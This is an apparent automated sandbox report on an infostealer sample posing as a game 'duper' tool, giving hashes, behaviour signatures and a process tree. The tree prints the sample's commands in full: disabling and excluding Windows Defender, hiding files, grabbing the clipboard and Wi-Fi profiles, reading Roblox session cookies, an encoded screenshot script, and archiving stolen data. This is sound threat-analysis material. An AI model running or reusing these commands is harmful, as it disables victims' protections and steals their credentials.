Analysis

  • max time kernel
    149s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250410-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/04/2025, 21:46

General

  • Target

    DSMP-Duper.exe

  • Size

    7.6MB

  • MD5

    c83c2c53a06ae5c2afbf349d82a2b528

  • SHA1

    46731510519aace4b0e618aabdb764a131d799ee

  • SHA256

    9e34b9a14817f6285298052f8d29a454cd770c70f52b617f86196f90cdca436f

  • SHA512

    d2f9b5053a5e9e8bf3c8acb5dd831239c59600d7b924cf85fc54516cede30191a4e04f2414645da943b3b532994f17b31cda90c2a818383b09f0fac938027446

  • SSDEEP

    196608:0WhDbHnwfI9jUCBB7m+mKOY7rXrZusoWDmhfvsbnTNkY:z3MIHL7HmBYXrYWaUNl

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 56 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies data under HKEY_USERS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\DSMP-Duper.exe
    "C:\Users\Admin\AppData\Local\Temp\DSMP-Duper.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1644
    • C:\Users\Admin\AppData\Local\Temp\DSMP-Duper.exe
      "C:\Users\Admin\AppData\Local\Temp\DSMP-Duper.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:5116
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DSMP-Duper.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4800
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DSMP-Duper.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2284
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5040
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1120
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4816
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1208
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4020
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4000
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1688
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:2660
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2524
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:4092
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3168
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:1576
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3968
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:5976
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\DSMP-Duper.exe""
            3⤵
            • Hide Artifacts: Hidden Files and Directories
            • Suspicious use of WriteProcessMemory
            PID:2640
            • C:\Windows\system32\attrib.exe
              attrib +h +s "C:\Users\Admin\AppData\Local\Temp\DSMP-Duper.exe"
              4⤵
              • Views/modifies file attributes
              PID:4372
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ​  .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:640
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ​  .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3584
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5840
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:1676
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5768
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:3352
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5028
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              4⤵
                PID:1792
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              3⤵
              • Clipboard Data
              PID:5852
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                4⤵
                • Clipboard Data
                • Suspicious behavior: EnumeratesProcesses
                PID:3668
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
                PID:116
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:3116
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                  PID:5172
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:5148
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                    3⤵
                    • System Network Configuration Discovery: Wi-Fi Discovery
                    PID:5100
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show profile
                      4⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      PID:5708
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "systeminfo"
                    3⤵
                      PID:2684
                      • C:\Windows\system32\systeminfo.exe
                        systeminfo
                        4⤵
                        • Gathers system information
                        PID:5336
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                      3⤵
                        PID:2688
                        • C:\Windows\system32\reg.exe
                          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                          4⤵
                            PID:4444
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                          3⤵
                            PID:4464
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1372
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mm2ujnj4\mm2ujnj4.cmdline"
                                5⤵
                                  PID:1096
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA3C2.tmp" "c:\Users\Admin\AppData\Local\Temp\mm2ujnj4\CSCB118573A1BD4473CADE9E2E361CC3450.TMP"
                                    6⤵
                                      PID:5464
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:3848
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:4744
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                    3⤵
                                      PID:6108
                                      • C:\Windows\system32\attrib.exe
                                        attrib -r C:\Windows\System32\drivers\etc\hosts
                                        4⤵
                                        • Drops file in Drivers directory
                                        • Views/modifies file attributes
                                        PID:5580
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      3⤵
                                        PID:4900
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          4⤵
                                            PID:3140
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                          3⤵
                                            PID:4752
                                            • C:\Windows\system32\attrib.exe
                                              attrib +r C:\Windows\System32\drivers\etc\hosts
                                              4⤵
                                              • Drops file in Drivers directory
                                              • Views/modifies file attributes
                                              PID:5804
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                            3⤵
                                              PID:5744
                                              • C:\Windows\system32\tasklist.exe
                                                tasklist /FO LIST
                                                4⤵
                                                • Enumerates processes with tasklist
                                                PID:5600
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:1276
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:4648
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  3⤵
                                                    PID:2040
                                                    • C:\Windows\system32\tree.com
                                                      tree /A /F
                                                      4⤵
                                                        PID:3820
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:1164
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:6072
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                          3⤵
                                                            PID:4272
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:2728
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            3⤵
                                                              PID:5244
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                4⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:1756
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "getmac"
                                                              3⤵
                                                                PID:5148
                                                                • C:\Windows\system32\getmac.exe
                                                                  getmac
                                                                  4⤵
                                                                    PID:4948
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI16442\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\SMD4R.zip" *"
                                                                  3⤵
                                                                    PID:4108
